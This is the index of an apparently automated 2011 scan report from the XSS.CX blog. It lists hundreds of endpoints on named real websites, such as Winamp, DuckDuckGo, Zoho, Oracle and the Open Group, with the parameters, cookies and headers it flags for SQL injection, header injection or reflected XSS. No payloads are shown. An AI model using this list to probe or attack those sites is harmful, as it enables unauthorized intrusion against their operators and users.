Morning DORK Report, XSS, SQL Injection, Cross Site Scripting, HTTP Header Injection, CWE-79, CWE-89, CWE-113

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX Research Blog at Tue Mar 01 09:24:04 CST 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

1. SQL injection

1.1. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 1]

1.2. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 2]

1.3. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 3]

1.4. http://bad-behavior.ioerror.us/blog/ [REST URL parameter 1]

1.5. http://bad-behavior.ioerror.us/category/bad-behavior/ [REST URL parameter 2]

1.6. http://bad-behavior.ioerror.us/category/bad-behavior/ [name of an arbitrarily supplied request parameter]

1.7. http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter]

1.8. http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter]

1.9. https://client.trafficshaping.com/_mint/ [User-Agent HTTP header]

1.10. http://duckduckgo.com/ie/v1/api/oembed [urls parameter]

1.11. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]

1.12. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]

1.13. http://o.aolcdn.com/os_merge/ [file parameter]

1.14. http://peoplepond.com/_mint/ [MintUnique cookie]

1.15. http://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]

1.16. http://shop.winamp.com/store [JSESSIONID cookie]

1.17. http://shop.winamp.com/store [Locale parameter]

1.18. http://shop.winamp.com/store [Referer HTTP header]

1.19. http://shop.winamp.com/store [ThemeID parameter]

1.20. http://shop.winamp.com/store [name of an arbitrarily supplied request parameter]

1.21. http://shop.winamp.com/store [productID parameter]

1.22. http://shop.winamp.com/store [s_pers cookie]

1.23. http://shop.winamp.com/store [s_sess cookie]

1.24. https://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]

1.25. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/QsQtRaU6mGT.css [REST URL parameter 4]

1.26. http://www.capgemini.com/insights-and-resources/ [name of an arbitrarily supplied request parameter]

1.27. http://www.companypond.com/ [name of an arbitrarily supplied request parameter]

1.28. http://www.dreamhost.com/r.cgi [129733 parameter]

1.29. http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter]

1.30. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]

1.31. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]

1.32. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]

2. HTTP header injection

2.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [REST URL parameter 1]

2.2. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B4924654.4 [REST URL parameter 1]

2.3. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5077405.10 [REST URL parameter 1]

2.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

2.5. https://duckduckgo.com/html/ [q parameter]

2.6. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Site2pstoreToken parameter]

2.7. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

2.8. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

2.9. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]

2.10. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]

2.11. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. https://accounts.zoho.com/login [serviceurl parameter]

3.2. https://accounts.zoho.com/login [serviceurl parameter]

3.3. https://accounts.zoho.com/register [serviceurl parameter]

3.4. https://accounts.zoho.com/register [serviceurl parameter]

3.5. https://accounts.zoho.com/register [serviceurl parameter]

3.6. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

3.7. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

3.8. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

3.9. http://alterianwaserver.alterianconnect.net/tracking.aspx/gettoken/ [callback parameter]

3.10. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/ [callback parameter]

3.11. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/ [callback parameter]

3.12. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpt parameter]

3.13. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [mpvc parameter]

3.14. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0 [name of an arbitrarily supplied request parameter]

3.15. http://api-public.addthis.com/url/shares.json [callback parameter]

3.16. http://api.postup.com/TCTUL001/twidget/1.jsonp [jsonp parameter]

3.17. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]

3.18. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.19. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.20. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.21. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.22. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.23. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.24. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.25. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.26. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [BnId parameter]

3.27. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 10]

3.28. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 11]

3.29. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 12]

3.30. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 13]

3.31. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 14]

3.32. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 15]

3.33. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 4]

3.34. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 5]

3.35. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 6]

3.36. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 7]

3.37. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 8]

3.38. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 9]

3.39. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start [name of an arbitrarily supplied request parameter]

3.40. https://client.trafficshaping.com/signin [email parameter]

3.41. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]

3.42. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 1]

3.43. http://dean.edwards.name/weblog/2006/03/faster [REST URL parameter 4]

3.44. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

3.45. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

3.46. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

3.47. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

3.48. http://ds.addthis.com/red/psi/sites/www.capgemini.com/p.json [callback parameter]

3.49. http://ds.addthis.com/red/psi/sites/www.virtusa.com/p.json [callback parameter]

3.50. http://duck.co/ [name of an arbitrarily supplied request parameter]

3.51. http://duck.co/duckduckgo-forum [name of an arbitrarily supplied request parameter]

3.52. http://duck.co/topic/2-25-news-stories-to-comment-on [name of an arbitrarily supplied request parameter]

3.53. http://duck.co/topic/2-28-articles-to-comment-on [name of an arbitrarily supplied request parameter]

3.54. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [name of an arbitrarily supplied request parameter]

3.55. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [name of an arbitrarily supplied request parameter]

3.56. http://duck.co/topic/cached-archived-links [name of an arbitrarily supplied request parameter]

3.57. http://duck.co/topic/changing-font-text-and-links [name of an arbitrarily supplied request parameter]

3.58. http://duck.co/topic/ddg-gg [name of an arbitrarily supplied request parameter]

3.59. http://duck.co/topic/ddg-in-alternative-web-browsers [name of an arbitrarily supplied request parameter]

3.60. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [name of an arbitrarily supplied request parameter]

3.61. http://duck.co/topic/ddg-own-search-engine [name of an arbitrarily supplied request parameter]

3.62. http://duck.co/topic/ddg-userbar-to-spread-the-word [name of an arbitrarily supplied request parameter]

3.63. http://duck.co/topic/default-header-color [name of an arbitrarily supplied request parameter]

3.64. http://duck.co/topic/differentiate-duckduckgo-with-other [name of an arbitrarily supplied request parameter]

3.65. http://duck.co/topic/duckduckgo-webs-com-custom-logos [name of an arbitrarily supplied request parameter]

3.66. http://duck.co/topic/foss-donation-nominations [name of an arbitrarily supplied request parameter]

3.67. http://duck.co/topic/freenet [name of an arbitrarily supplied request parameter]

3.68. http://duck.co/topic/historical-traffic-stats [name of an arbitrarily supplied request parameter]

3.69. http://duck.co/topic/how-to-get-similar-growth-for-2011 [name of an arbitrarily supplied request parameter]

3.70. http://duck.co/topic/i-did-my-own-way-to-promote-ddg [name of an arbitrarily supplied request parameter]

3.71. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click [name of an arbitrarily supplied request parameter]

3.72. http://duck.co/topic/logging-in-message-email-not-confirmed [name of an arbitrarily supplied request parameter]

3.73. http://duck.co/topic/maps [name of an arbitrarily supplied request parameter]

3.74. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines [name of an arbitrarily supplied request parameter]

3.75. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon [name of an arbitrarily supplied request parameter]

3.76. http://duck.co/topic/post-your-ddg-sticker-photos [name of an arbitrarily supplied request parameter]

3.77. http://duck.co/topic/q-html-entities [name of an arbitrarily supplied request parameter]

3.78. http://duck.co/topic/searching-for-roommates-on-craigslist [name of an arbitrarily supplied request parameter]

3.79. http://duck.co/topic/spam-site-found [name of an arbitrarily supplied request parameter]

3.80. http://duck.co/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest [name of an arbitrarily supplied request parameter]

3.81. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional [name of an arbitrarily supplied request parameter]

3.82. http://duck.co/topic/words-to-live-by [name of an arbitrarily supplied request parameter]

3.83. http://duck.co/topic/wot-highlighting [name of an arbitrarily supplied request parameter]

3.84. http://duckduckgo.com/d.js [s parameter]

3.85. http://duckduckgo.com/ie/v1/api/oembed [callback parameter]

3.86. http://duckduckgo.com/ie/v1/api/oembed [maxwidth parameter]

3.87. http://duckduckgo.com/ie/v1/api/oembed [urls parameter]

3.88. http://duckduckgo.com/iq/v1/twitter/cloudscan/services.json [callback parameter]

3.89. http://duckduckgo.com/iq/v1/twitter/cloudscan/services.json [request_id parameter]

3.90. https://duckduckgo.com/e.js [go parameter]

3.91. https://event.on24.com/eventRegistration/EventLobbyServlet [key parameter]

3.92. https://event.on24.com/eventRegistration/EventLobbyServlet [partnerref parameter]

3.93. https://event.on24.com/eventRegistration/EventLobbyServlet [sourcepage parameter]

3.94. http://fonts.googleapis.com/css [family parameter]

3.95. http://init.zopim.com/register [mID parameter]

3.96. http://klout.com/ [name of an arbitrarily supplied request parameter]

3.97. http://klout.com/business [name of an arbitrarily supplied request parameter]

3.98. http://klout.com/perks [name of an arbitrarily supplied request parameter]

3.99. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

3.100. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

3.101. https://login.silverlight.net/login/signin.aspx [returnurl parameter]

3.102. http://odb.outbrain.com/utils/get [callback parameter]

3.103. http://plancast.com/p/3zbp [REST URL parameter 2]

3.104. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

3.105. http://rapportive.com/stylesheets/jquery.fancybox-1.3.1.css [REST URL parameter 2]

3.106. http://rapportive.com/stylesheets/website_screen.css [REST URL parameter 2]

3.107. https://shop.winamp.com/DRHM/store [name of an arbitrarily supplied request parameter]

3.108. https://shop.winamp.com/store [name of an arbitrarily supplied request parameter]

3.109. https://sso.springsource.com/cas/CSS/style-local.css [name of an arbitrarily supplied request parameter]

3.110. https://sso.springsource.com/cas/login [name of an arbitrarily supplied request parameter]

3.111. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good.json [callback parameter]

3.112. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good/record/view [callback parameter]

3.113. http://REDACTED/CNT/iview/302784236/direct [name of an arbitrarily supplied request parameter]

3.114. http://widgets.digg.com/buttons/count [url parameter]

3.115. http://www.business-software.com/top-10-web-content-management-vendors.php [gclid parameter]

3.116. http://www.business-software.com/top-10-web-content-management-vendors.php [keyword parameter]

3.117. http://www.business-software.com/top-10-web-content-management-vendors.php [name of an arbitrarily supplied request parameter]

3.118. http://www.business-software.com/top-10-web-content-management-vendors.php [track parameter]

3.119. http://www.business-software.com/top-10-web-content-management-vendors.php [traffic parameter]

3.120. http://www.linkedin.com/cws/share-count [url parameter]

3.121. http://www.montrealkiosk.com/directory.php [categoryId parameter]

3.122. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]

3.123. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]

3.124. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]

3.125. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]

3.126. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]

3.127. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]

3.128. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

3.129. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

3.130. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]

3.131. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

3.132. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

3.133. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]

3.134. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

3.135. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

3.136. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

3.137. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

3.138. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

3.139. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

3.140. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

3.141. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

3.142. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

3.143. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

3.144. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

3.145. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

3.146. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

3.147. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

3.148. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

3.149. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

3.150. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

3.151. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

3.152. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

3.153. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

3.154. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 1]

3.155. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

3.156. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

3.157. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 2]

3.158. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

3.159. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

3.160. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 3]

3.161. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

3.162. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

3.163. http://www.opengroup.org/architecture/togaf8-doc/arch/welcome.html [REST URL parameter 4]

3.164. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

3.165. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

3.166. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 1]

3.167. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

3.168. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

3.169. http://www.opengroup.org/events/sponsor-exhibit.htm [REST URL parameter 2]

3.170. http://www.opengroup.org/favicon.ico [REST URL parameter 1]

3.171. http://www.opengroup.org/favicon.ico [REST URL parameter 1]

3.172. http://www.opengroup.org/member/ [REST URL parameter 1]

3.173. http://www.opengroup.org/member/ [REST URL parameter 1]

3.174. http://www.opengroup.org/member/ [REST URL parameter 1]

3.175. http://www.opengroup.org/togaf/ [REST URL parameter 1]

3.176. http://www.opengroup.org/togaf/ [REST URL parameter 1]

3.177. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

3.178. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

3.179. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]

3.180. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

3.181. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

3.182. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]

3.183. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [bean parameter]

3.184. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [method parameter]

3.185. http://www.prchecker.info/check_page_rank.php [name of an arbitrarily supplied request parameter]

3.186. http://www.prchecker.info/check_page_rank.php [urlo parameter]

3.187. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]

3.188. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]

3.189. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]

3.190. http://www.virtusa.com/applications/userlogin/userlogin.asp [fn parameter]

3.191. http://www.virtusa.com/common/exitpage.asp [page parameter]

3.192. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]

3.193. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]

3.194. http://www.watchmouse.com/en/ [REST URL parameter 1]

3.195. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]

3.196. http://www.watchmouse.com/en/api/checkreferrer.php [REST URL parameter 3]

3.197. http://www.winamp.com/media-player/en [REST URL parameter 2]

3.198. http://www.wolframalpha.com/input/ [i parameter]

3.199. http://www.wolframalpha.com/input/ [name of an arbitrarily supplied request parameter]

3.200. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ck parameter]

3.201. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cm parameter]

3.202. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cmp parameter]

3.203. https://www14.software.ibm.com/webapp/iwm/web/signup.do [cr parameter]

3.204. https://www14.software.ibm.com/webapp/iwm/web/signup.do [csr parameter]

3.205. https://www14.software.ibm.com/webapp/iwm/web/signup.do [ct parameter]

3.206. https://www14.software.ibm.com/webapp/iwm/web/signup.do [mkwid parameter]

3.207. https://www14.software.ibm.com/webapp/iwm/web/signup.do [name of an arbitrarily supplied request parameter]

3.208. http://duckduckgo.com/ [Referer HTTP header]

3.209. http://duckduckgo.com/Assan_language [Referer HTTP header]

3.210. http://duckduckgo.com/Cross-site_scripting [Referer HTTP header]

3.211. http://duckduckgo.com/HTTP_referrer [Referer HTTP header]

3.212. http://duckduckgo.com/Microsoft_Visual_Studio [Referer HTTP header]

3.213. http://duckduckgo.com/NaN [Referer HTTP header]

3.214. http://duckduckgo.com/User_agent [Referer HTTP header]

3.215. http://duckduckgo.com/c/Computer_arithmetic [Referer HTTP header]

3.216. http://duckduckgo.com/c/Computing_acronyms [Referer HTTP header]

3.217. http://duckduckgo.com/c/Software_anomalies [Referer HTTP header]

3.218. http://duckduckgo.com/c/The_Simpsons_characters [Referer HTTP header]

3.219. http://duckduckgo.com/e.js [Referer HTTP header]

3.220. https://duckduckgo.com/ [Referer HTTP header]

3.221. https://duckduckgo.com/Electronic_Frontier_Foundation [Referer HTTP header]

3.222. https://duckduckgo.com/HTTP_Secure [Referer HTTP header]

3.223. https://duckduckgo.com/HTTP_cookie [Referer HTTP header]

3.224. https://duckduckgo.com/IP_Address [Referer HTTP header]

3.225. https://duckduckgo.com/e.js [Referer HTTP header]

3.226. https://duckduckgo.com/e.js [Referer HTTP header]

3.227. https://event.on24.com/eventRegistration/EventLobbyServlet [User-Agent HTTP header]

3.228. https://login.oracle.com/mysso/signon.jsp [Referer HTTP header]

3.229. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Referer HTTP header]

3.230. http://telligent.com/products/request_a_demo.aspx [Referer HTTP header]

3.231. http://telligent.com/resources/m/analysts/1343205.aspx [Referer HTTP header]

3.232. http://telligent.com/resources/m/analysts/1345217.aspx [Referer HTTP header]

3.233. http://telligent.com/resources/m/success_stories/1331597.aspx [Referer HTTP header]

3.234. http://telligent.com/support/request_an_upgrade/ [Referer HTTP header]

3.235. http://www.fusionbot.com/ [Referer HTTP header]

3.236. http://www.virtusa.com/contactus [Referer HTTP header]

3.237. http://www.virtusa.com/contactus/ [Referer HTTP header]

3.238. http://www.virtusa.com/ftbu/contactus/default.asp [Referer HTTP header]

3.239. http://www.watchmouse.com/en/ [Referer HTTP header]

3.240. https://accounts.zoho.com/login [iamcsr cookie]

3.241. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3.242. http://duck.co/duckduckgo-forum [zdccn cookie]

3.243. http://duck.co/duckduckgo-forum [zdccn cookie]

3.244. http://duck.co/portalLogin.do [zdccn cookie]

3.245. http://duck.co/topic/2-25-news-stories-to-comment-on [zdccn cookie]

3.246. http://duck.co/topic/2-25-news-stories-to-comment-on [zdccn cookie]

3.247. http://duck.co/topic/2-28-articles-to-comment-on [zdccn cookie]

3.248. http://duck.co/topic/2-28-articles-to-comment-on [zdccn cookie]

3.249. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [zdccn cookie]

3.250. http://duck.co/topic/about-com-s-web-search-readers-choice-awards [zdccn cookie]

3.251. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [zdccn cookie]

3.252. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query [zdccn cookie]

3.253. http://duck.co/topic/cached-archived-links [zdccn cookie]

3.254. http://duck.co/topic/cached-archived-links [zdccn cookie]

3.255. http://duck.co/topic/changing-font-text-and-links [zdccn cookie]

3.256. http://duck.co/topic/changing-font-text-and-links [zdccn cookie]

3.257. http://duck.co/topic/ddg-gg [zdccn cookie]

3.258. http://duck.co/topic/ddg-gg [zdccn cookie]

3.259. http://duck.co/topic/ddg-in-alternative-web-browsers [zdccn cookie]

3.260. http://duck.co/topic/ddg-in-alternative-web-browsers [zdccn cookie]

3.261. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [zdccn cookie]

3.262. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers [zdccn cookie]

3.263. http://duck.co/topic/ddg-own-search-engine [zdccn cookie]

3.264. http://duck.co/topic/ddg-own-search-engine [zdccn cookie]

3.265. http://duck.co/topic/ddg-userbar-to-spread-the-word [zdccn cookie]

3.266. http://duck.co/topic/ddg-userbar-to-spread-the-word [zdccn cookie]

3.267. http://duck.co/topic/default-header-color [zdccn cookie]

3.268. http://duck.co/topic/default-header-color [zdccn cookie]

3.269. http://duck.co/topic/differentiate-duckduckgo-with-other [zdccn cookie]

3.270. http://duck.co/topic/differentiate-duckduckgo-with-other [zdccn cookie]

3.271. http://duck.co/topic/duckduckgo-webs-com-custom-logos [zdccn cookie]

3.272. http://duck.co/topic/duckduckgo-webs-com-custom-logos [zdccn cookie]

3.273. http://duck.co/topic/foss-donation-nominations [zdccn cookie]

3.274. http://duck.co/topic/foss-donation-nominations [zdccn cookie]

3.275. http://duck.co/topic/freenet [zdccn cookie]

3.276. http://duck.co/topic/freenet [zdccn cookie]

3.277. http://duck.co/topic/historical-traffic-stats [zdccn cookie]

3.278. http://duck.co/topic/historical-traffic-stats [zdccn cookie]

